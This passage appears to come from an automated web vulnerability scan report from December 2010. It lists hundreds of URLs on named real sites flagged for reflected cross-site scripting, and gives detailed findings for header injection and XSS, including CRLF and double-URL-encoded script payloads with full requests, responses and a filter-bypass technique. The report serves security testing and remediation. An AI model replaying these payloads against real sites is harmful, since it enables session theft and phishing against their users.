2.454. http://www.fancast.com/blogs/2010/tv-news/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/ [REST URL parameter 3]

2.455. http://www.fancast.com/blogs/2010/tv-news/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/ [REST URL parameter 3]

2.456. http://www.fancast.com/blogs/2010/tv-news/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/ [name of an arbitrarily supplied request parameter]

2.457. http://www.fancast.com/blogs/2010/tv-news/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/ [name of an arbitrarily supplied request parameter]

2.458. http://www.fancast.com/blogs/2010/tv-news/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/ [REST URL parameter 3]

2.459. http://www.fancast.com/blogs/2010/tv-news/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/ [REST URL parameter 3]

2.460. http://www.fancast.com/blogs/2010/tv-news/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/ [name of an arbitrarily supplied request parameter]

2.461. http://www.fancast.com/blogs/2010/tv-news/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/ [name of an arbitrarily supplied request parameter]

2.462. http://www.fancast.com/blogs/2010/tv-news/huge-ratings-for-larry-kings-finale/ [REST URL parameter 3]

2.463. http://www.fancast.com/blogs/2010/tv-news/huge-ratings-for-larry-kings-finale/ [REST URL parameter 3]

2.464. http://www.fancast.com/blogs/2010/tv-news/huge-ratings-for-larry-kings-finale/ [name of an arbitrarily supplied request parameter]

2.465. http://www.fancast.com/blogs/2010/tv-news/huge-ratings-for-larry-kings-finale/ [name of an arbitrarily supplied request parameter]

2.466. http://www.fancast.com/blogs/2010/tv-news/jersey-shores-ronnie-indicted-on-assault-charge/ [REST URL parameter 3]

2.467. http://www.fancast.com/blogs/2010/tv-news/jersey-shores-ronnie-indicted-on-assault-charge/ [REST URL parameter 3]

2.468. http://www.fancast.com/blogs/2010/tv-news/jersey-shores-ronnie-indicted-on-assault-charge/ [name of an arbitrarily supplied request parameter]

2.469. http://www.fancast.com/blogs/2010/tv-news/jersey-shores-ronnie-indicted-on-assault-charge/ [name of an arbitrarily supplied request parameter]

2.470. http://www.fancast.com/blogs/2010/tv-news/late-night-foes-ferguson-and-fallon-swap-gifts/ [REST URL parameter 3]

2.471. http://www.fancast.com/blogs/2010/tv-news/late-night-foes-ferguson-and-fallon-swap-gifts/ [REST URL parameter 3]

2.472. http://www.fancast.com/blogs/2010/tv-news/late-night-foes-ferguson-and-fallon-swap-gifts/ [name of an arbitrarily supplied request parameter]

2.473. http://www.fancast.com/blogs/2010/tv-news/late-night-foes-ferguson-and-fallon-swap-gifts/ [name of an arbitrarily supplied request parameter]

2.474. http://www.fancast.com/blogs/2010/tv-news/lettermans-top-ten-things-overheard-on-larry-kings-final-show/ [REST URL parameter 3]

2.475. http://www.fancast.com/blogs/2010/tv-news/lettermans-top-ten-things-overheard-on-larry-kings-final-show/ [REST URL parameter 3]

2.476. http://www.fancast.com/blogs/2010/tv-news/lettermans-top-ten-things-overheard-on-larry-kings-final-show/ [name of an arbitrarily supplied request parameter]

2.477. http://www.fancast.com/blogs/2010/tv-news/lettermans-top-ten-things-overheard-on-larry-kings-final-show/ [name of an arbitrarily supplied request parameter]

2.478. http://www.fancast.com/blogs/2010/tv-news/neil-patrick-harris-slams-eric-braeden-for-bailing/ [REST URL parameter 3]

2.479. http://www.fancast.com/blogs/2010/tv-news/neil-patrick-harris-slams-eric-braeden-for-bailing/ [REST URL parameter 3]

2.480. http://www.fancast.com/blogs/2010/tv-news/neil-patrick-harris-slams-eric-braeden-for-bailing/ [name of an arbitrarily supplied request parameter]

2.481. http://www.fancast.com/blogs/2010/tv-news/neil-patrick-harris-slams-eric-braeden-for-bailing/ [name of an arbitrarily supplied request parameter]

2.482. http://www.fancast.com/blogs/2010/tv-news/olbermann-attacked-on-twitter-calls-oreilly-the-worst/ [REST URL parameter 3]

2.483. http://www.fancast.com/blogs/2010/tv-news/olbermann-attacked-on-twitter-calls-oreilly-the-worst/ [REST URL parameter 3]

2.484. http://www.fancast.com/blogs/2010/tv-news/olbermann-attacked-on-twitter-calls-oreilly-the-worst/ [name of an arbitrarily supplied request parameter]

2.485. http://www.fancast.com/blogs/2010/tv-news/olbermann-attacked-on-twitter-calls-oreilly-the-worst/ [name of an arbitrarily supplied request parameter]

2.486. http://www.fancast.com/blogs/2010/tv-news/sarah-palin-fires-back-calls-sorkins-criticism-appalling/ [REST URL parameter 3]

2.487. http://www.fancast.com/blogs/2010/tv-news/sarah-palin-fires-back-calls-sorkins-criticism-appalling/ [REST URL parameter 3]

2.488. http://www.fancast.com/blogs/2010/tv-news/sarah-palin-fires-back-calls-sorkins-criticism-appalling/ [name of an arbitrarily supplied request parameter]

2.489. http://www.fancast.com/blogs/2010/tv-news/sarah-palin-fires-back-calls-sorkins-criticism-appalling/ [name of an arbitrarily supplied request parameter]

2.490. http://www.fancast.com/blogs/2010/tv-news/survivor-hall-of-fame-inductee-sandra-diaz-twine/ [REST URL parameter 3]

2.491. http://www.fancast.com/blogs/2010/tv-news/survivor-hall-of-fame-inductee-sandra-diaz-twine/ [REST URL parameter 3]

2.492. http://www.fancast.com/blogs/2010/tv-news/survivor-hall-of-fame-inductee-sandra-diaz-twine/ [name of an arbitrarily supplied request parameter]

2.493. http://www.fancast.com/blogs/2010/tv-news/survivor-hall-of-fame-inductee-sandra-diaz-twine/ [name of an arbitrarily supplied request parameter]

2.494. http://www.fancast.com/blogs/2010/tv-news/survivor-nicaragua-power-rankings-the-final-round/ [REST URL parameter 3]

2.495. http://www.fancast.com/blogs/2010/tv-news/survivor-nicaragua-power-rankings-the-final-round/ [REST URL parameter 3]

2.496. http://www.fancast.com/blogs/2010/tv-news/survivor-nicaragua-power-rankings-the-final-round/ [name of an arbitrarily supplied request parameter]

2.497. http://www.fancast.com/blogs/2010/tv-news/survivor-nicaragua-power-rankings-the-final-round/ [name of an arbitrarily supplied request parameter]

2.498. http://www.fancast.com/blogs/2010/tv-news/the-good-wife-gets-social-in-facebook-stunt-episode/ [REST URL parameter 3]

2.499. http://www.fancast.com/blogs/2010/tv-news/the-good-wife-gets-social-in-facebook-stunt-episode/ [REST URL parameter 3]

2.500. http://www.fancast.com/blogs/2010/tv-news/the-good-wife-gets-social-in-facebook-stunt-episode/ [name of an arbitrarily supplied request parameter]

2.501. http://www.fancast.com/blogs/2010/tv-news/the-good-wife-gets-social-in-facebook-stunt-episode/ [name of an arbitrarily supplied request parameter]

2.502. https://www.linkedin.com/secure/login [REST URL parameter 1]

2.503. http://www.move.com/trends/ [name of an arbitrarily supplied request parameter]

2.504. http://www.move.com/trends/celebrity-real-estate-highlights-36/ [REST URL parameter 2]

2.505. http://www.move.com/trends/celebrity-real-estate-highlights-36/ [name of an arbitrarily supplied request parameter]

2.506. http://www.move.com/trends/charity-gifts-for-christmas/ [REST URL parameter 2]

2.507. http://www.move.com/trends/charity-gifts-for-christmas/ [name of an arbitrarily supplied request parameter]

2.508. http://www.move.com/trends/holiday-gifts-for-the-cat-lover/ [REST URL parameter 2]

2.509. http://www.move.com/trends/holiday-gifts-for-the-cat-lover/ [name of an arbitrarily supplied request parameter]

2.510. http://www.move.com/trends/holiday-gifts-for-the-dog-lover/ [REST URL parameter 2]

2.511. http://www.move.com/trends/holiday-gifts-for-the-dog-lover/ [name of an arbitrarily supplied request parameter]

2.512. http://www.move.com/trends/sweet-holiday-treats-in-san-francisco/ [REST URL parameter 2]

2.513. http://www.move.com/trends/sweet-holiday-treats-in-san-francisco/ [name of an arbitrarily supplied request parameter]

2.514. http://www.mystyle.com/mystyle/photos/gallery.jsp [name of an arbitrarily supplied request parameter]

2.515. http://www.mystyle.com/mystyle/photos/gallery.jsp [name of an arbitrarily supplied request parameter]

2.516. http://www.nahb.org/news.aspx [name of an arbitrarily supplied request parameter]

2.517. http://www.nahb.org/page.aspx/landing/sectionID=85 [name of an arbitrarily supplied request parameter]

2.518. http://www.necn.com/12/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html [REST URL parameter 1]

2.519. http://www.necn.com/12/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html [REST URL parameter 2]

2.520. http://www.necn.com/12/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html [REST URL parameter 3]

2.521. http://www.necn.com/12/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html [REST URL parameter 4]

2.522. http://www.necn.com/12/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html [name of an arbitrarily supplied request parameter]

2.523. http://www.necn.com/12/19/10/Holiday-mad-dash/landing.html [REST URL parameter 1]

2.524. http://www.necn.com/12/19/10/Holiday-mad-dash/landing.html [REST URL parameter 2]

2.525. http://www.necn.com/12/19/10/Holiday-mad-dash/landing.html [REST URL parameter 3]

2.526. http://www.necn.com/12/19/10/Holiday-mad-dash/landing.html [REST URL parameter 4]

2.527. http://www.necn.com/12/19/10/Holiday-mad-dash/landing.html [name of an arbitrarily supplied request parameter]

2.528. http://www.necn.com/12/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html [REST URL parameter 1]

2.529. http://www.necn.com/12/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html [REST URL parameter 2]

2.530. http://www.necn.com/12/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html [REST URL parameter 3]

2.531. http://www.necn.com/12/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html [REST URL parameter 4]

2.532. http://www.necn.com/12/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html [name of an arbitrarily supplied request parameter]

2.533. http://www.necn.com/12/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html [REST URL parameter 1]

2.534. http://www.necn.com/12/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html [REST URL parameter 2]

2.535. http://www.necn.com/12/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html [REST URL parameter 3]

2.536. http://www.necn.com/12/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html [REST URL parameter 4]

2.537. http://www.necn.com/12/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html [name of an arbitrarily supplied request parameter]

2.538. http://www.necn.com/12/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html [REST URL parameter 1]

2.539. http://www.necn.com/12/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html [REST URL parameter 2]

2.540. http://www.necn.com/12/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html [REST URL parameter 3]

2.541. http://www.necn.com/12/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html [REST URL parameter 4]

2.542. http://www.necn.com/12/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html [name of an arbitrarily supplied request parameter]

2.543. http://www.themtn.tv/04/27/10/MBK-Rebel-Matt-Shaw-to-miss-final-season/landing.html [REST URL parameter 5]

2.544. http://www.themtn.tv/05/11/10/MGLF-CSU-Claims-Mountain-West-Title/landing.html [REST URL parameter 5]

2.545. http://www.themtn.tv/05/19/10/CSU-Hosts-first-annual-Football-101-for-/landing.html [REST URL parameter 5]

2.546. http://www.themtn.tv/05/19/10/FB-Unga-Will-Not-Return-To-BYU/landing.html [REST URL parameter 5]

2.547. http://www.themtn.tv/06/01/10/Around-the-Mountain---Air-Force-Football/landing.html [REST URL parameter 5]

2.548. http://www.themtn.tv/06/01/10/Top-5-Plays-of-the-Year-Air-Force-Falcon/landing.html [REST URL parameter 5]

2.549. http://www.themtn.tv/06/14/10/Top-5-Plays-of-the-Year-Colorado-State-R/landing.html [REST URL parameter 5]

2.550. http://www.themtn.tv/06/16/10/Around-the-Mountain-CSU-Edition-img-srch/landing.html [REST URL parameter 5]

2.551. http://www.themtn.tv/06/16/10/Watch-The-TCU-Press-Conference-Live-at-1/landing.html [REST URL parameter 5]

2.552. http://www.themtn.tv/06/29/10/San-Diego-States-Top-5-Plays-of-the-Year/landing.html [REST URL parameter 5]

2.553. http://www.themtn.tv/07/13/10/Watch-The-UNLV-Rebels-Top-5-Plays-of-the/landing.html [REST URL parameter 5]

2.554. http://www.themtn.tv/08/05/10/ATM-Teams-Improving-img-srchttpthemtntvi/landing.html [REST URL parameter 5]

2.555. http://www.themtn.tv/09/08/10/Excellent-Source-for-Breaking-News/landing.html [REST URL parameter 5]

2.556. http://www.themtn.tv/09/14/10/Quality-Original-Programming/landing.html [REST URL parameter 5]

2.557. http://www.themtn.tv/09/18/10/FB-Rams-Lose-Third-Straight-31-10/landing.html [REST URL parameter 5]

2.558. http://www.themtn.tv/09/23/10/An-Impressed-Viewer/landing.html [REST URL parameter 5]

2.559. http://www.themtn.tv/10/13/10/ALL-22-Is-Alright/landing.html [REST URL parameter 5]

2.560. http://www.themtn.tv/10/27/10/Mountain-West-Football-Saturday-Comments/landing.html [REST URL parameter 5]

2.561. http://www.themtn.tv/11/20/10/FB-BYU-Becomes-Bowl-Eligible-After-Win-O/landing.html [REST URL parameter 5]

2.562. http://www.themtn.tv/11/20/10/FB-Wyoming-Shuts-Out-Rams-44-0-img-srcht/landing.html [REST URL parameter 5]

2.563. http://www.themtn.tv/11/21/10/FB-Utah-Outlasts-Aztecs-38-34/landing.html [REST URL parameter 5]

2.564. http://www.themtn.tv/11/27/10/FB-SDSU-Blows-BY-UNLV-48-14-img-srchttpt/landing.html [REST URL parameter 5]

2.565. http://www.themtn.tv/11/27/10/FB-TCU-Finishes-Strong-Over-Lobos-66-17-/landing.html [REST URL parameter 5]

2.566. http://www.themtn.tv/11/27/10/FB-Utah-Tops-BYU-17-16-img-srchttpthemtn/landing.html [REST URL parameter 5]

2.567. http://www.themtn.tv/11/27/10/MWC-Coach-Pressers-Week-13-img-srchttpth/landing.html [REST URL parameter 5]

2.568. http://www.themtn.tv/11/27/10/Todd-Christensen-The-End-of-an-Era-img-s/landing.html [REST URL parameter 5]

2.569. http://www.themtn.tv/11/29/10/TCU-Accepts-Big-East-Invite/landing.html [REST URL parameter 5]

2.570. http://www.themtn.tv/12/01/10/MBK-CSU-Runs-by-Drake-78-67-img-srchttpt/landing.html [REST URL parameter 5]

2.571. http://www.themtn.tv/12/01/10/The-Mtn-Launches-in-Atlanta-Grows-Covera/landing.html [REST URL parameter 5]

2.572. http://www.themtn.tv/12/02/10/MBK-Aztecs-Dominate-St-Marys-69-55-img-s/landing.html [REST URL parameter 5]

2.573. http://www.themtn.tv/12/04/10/MBK-TCU-Falls-to-Northern-Iowa-64-60-img/landing.html [REST URL parameter 5]

2.574. http://www.themtn.tv/12/04/10/MBK-Wyoming-Dominates-Indiana-State-81-5/landing.html [REST URL parameter 5]

2.575. http://www.themtn.tv/12/05/10/Frogs-to-Smell-the-Roses-Vegas-Gets-Top-/landing.html [REST URL parameter 5]

2.576. http://www.themtn.tv/12/07/10/WBK-Lobos-Fall-to-Arizona-84-60/landing.html [REST URL parameter 5]

2.577. http://www.themtn.tv/12/08/10/Knudson-Not-Your-Steppin-Stone-img-srcht/landing.html [REST URL parameter 5]

2.578. http://www.themtn.tv/12/10/10/Knudson-MWC-Hoops-Looking-Pretty-Powerfu/landing.html [REST URL parameter 5]

2.579. http://www.themtn.tv/12/10/10/MBK-15-SDSU-Tops-In-State-Rival-Cal-77-5/landing.html [REST URL parameter 5]

2.580. http://www.themtn.tv/12/10/10/MBK-18-BYU-Gives-Fredette-Succesful-Home/landing.html [REST URL parameter 5]

2.581. http://www.themtn.tv/12/11/10/MBK-Lobos-Sweep-Rivalry-Series-78-62-img/landing.html [REST URL parameter 5]

2.582. http://www.themtn.tv/12/14/10/The-Mtn-Available-on-Additional-Comcast-/landing.html [REST URL parameter 5]

2.583. http://www.themtn.tv/12/15/10/Knudson-The-Slant-on-the-New-Mexico-Bowl/landing.html [REST URL parameter 5]

2.584. http://www.themtn.tv/12/16/10/Around-the-Mountain-Web-Edition-img-srch/landing.html [REST URL parameter 5]

2.585. http://www.themtn.tv/12/16/10/WBK-Cowgirls-Fall-to-Badgers-63-59-img-s/landing.html [REST URL parameter 5]

2.586. http://www.themtn.tv/12/18/10/BYU-Overpowers-UTEP-in-New-Mexico-Bowl-5/landing.html [REST URL parameter 5]

2.587. http://www.themtn.tv/12/18/10/Knudson-The-Slant-on-the-Las-Vegas-Bowl/landing.html [REST URL parameter 5]

2.588. http://www.themtn.tv/common/ad_count.php [REST URL parameter 1]

2.589. http://www.themtn.tv/common/ad_count.php [REST URL parameter 2]

2.590. http://www.themtn.tv/common/dynrss/dynrss_3174_landing_.rss [REST URL parameter 1]

2.591. http://www.themtn.tv/common/dynrss/dynrss_3174_landing_.rss [REST URL parameter 2]

2.592. http://www.themtn.tv/common/dynrss/dynrss_3174_landing_.rss [REST URL parameter 3]

2.593. http://www.themtn.tv/common/global_flash/player/player.php [REST URL parameter 1]

2.594. http://www.themtn.tv/common/global_flash/player/player.php [REST URL parameter 2]

2.595. http://www.themtn.tv/common/global_flash/player/player.php [REST URL parameter 3]

2.596. http://www.themtn.tv/common/global_flash/player/player.php [REST URL parameter 4]

2.597. http://www.themtn.tv/common/js/aggregate.js [REST URL parameter 3]

2.598. http://www.themtn.tv/favicon.ico [REST URL parameter 1]

2.599. http://www.themtn.tv/pages/main [REST URL parameter 1]

2.600. http://www.themtn.tv/pages/main [REST URL parameter 2]

2.601. http://www.themtn.tv/pages/main [name of an arbitrarily supplied request parameter]

2.602. http://www.tumri.net/ads/mts/6274 [name of an arbitrarily supplied request parameter]

2.603. http://www.tvoneonline.com/gettvone.asp [name of an arbitrarily supplied request parameter]

2.604. http://www.tvoneonline.com/video/b_player.php [name of an arbitrarily supplied request parameter]

2.605. http://www.tweetology.com/images/button-login.png [REST URL parameter 1]

2.606. http://www.tweetology.com/images/button-login.png [REST URL parameter 2]

2.607. http://www.tweetology.com/images/widget/scrollbar-top-e8e8e8.png [REST URL parameter 1]

2.608. http://www.tweetology.com/images/widget/scrollbar-top-e8e8e8.png [REST URL parameter 2]

2.609. http://www5.nohold.net/Comcast/Loginr.aspx [name of an arbitrarily supplied request parameter]

2.610. http://www5.nohold.net/Comcast/login.aspx [name of an arbitrarily supplied request parameter]

2.611. http://jobsearch.comcast.monster.com/ [Referer HTTP header]

2.612. http://www.addthis.com/bookmark.php [Referer HTTP header]

2.613. http://www.addthis.com/bookmark.php [Referer HTTP header]



1. HTTP header injection
There are 2 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://www.destinationurl.com/1ab3/dclk.beacon/beacon1 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.destinationurl.com
Path:   /1ab3/dclk.beacon/beacon1

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2161b%0d%0ad9dd7e4e338 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2161b%0d%0ad9dd7e4e338/dclk.beacon/beacon1 HTTP/1.1
Host: www.destinationurl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2161b
d9dd7e4e338
/dclk.beacon/beacon1:
Date: Sun, 19 Dec 2010 18:33:52 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.2. http://www.destinationurl.com/1ab3/dclk.beaconreceived/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.destinationurl.com
Path:   /1ab3/dclk.beaconreceived/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 15e15%0d%0ad4200a93b03 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /15e15%0d%0ad4200a93b03/dclk.beaconreceived/ HTTP/1.1
Host: www.destinationurl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/15e15
d4200a93b03
/dclk.beaconreceived/:
Date: Sun, 19 Dec 2010 18:33:54 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2. Cross-site scripting (reflected)
There are 613 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: strict validation of input on arrival, based on the kind of content each field is expected to contain, and HTML-encoding of user-controllable data at every point where it is copied into a response.

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d70c2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eedcf3732e98 was submitted in the REST URL parameter 2. This input was echoed as d70c2"><script>alert(1)</script>edcf3732e98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357d70c2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eedcf3732e98/561.0.iframe.120x30/1292781815776969 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357d70c2"><script>alert(1)</script>edcf3732e98/561.0.iframe.120x30/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.2. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1f7a%2522%253balert%25281%2529%252f%252fe814149ac20 was submitted in the REST URL parameter 2. This input was echoed as b1f7a";alert(1)//e814149ac20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357b1f7a%2522%253balert%25281%2529%252f%252fe814149ac20/561.0.iframe.120x30/1292781815776969 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357b1f7a";alert(1)//e814149ac20/561.0.iframe.120x30/1292781965**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.3. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 351b5%2522%253balert%25281%2529%252f%252f463fb0d5a8a was submitted in the REST URL parameter 3. This input was echoed as 351b5";alert(1)//463fb0d5a8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30351b5%2522%253balert%25281%2529%252f%252f463fb0d5a8a/1292781815776969 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

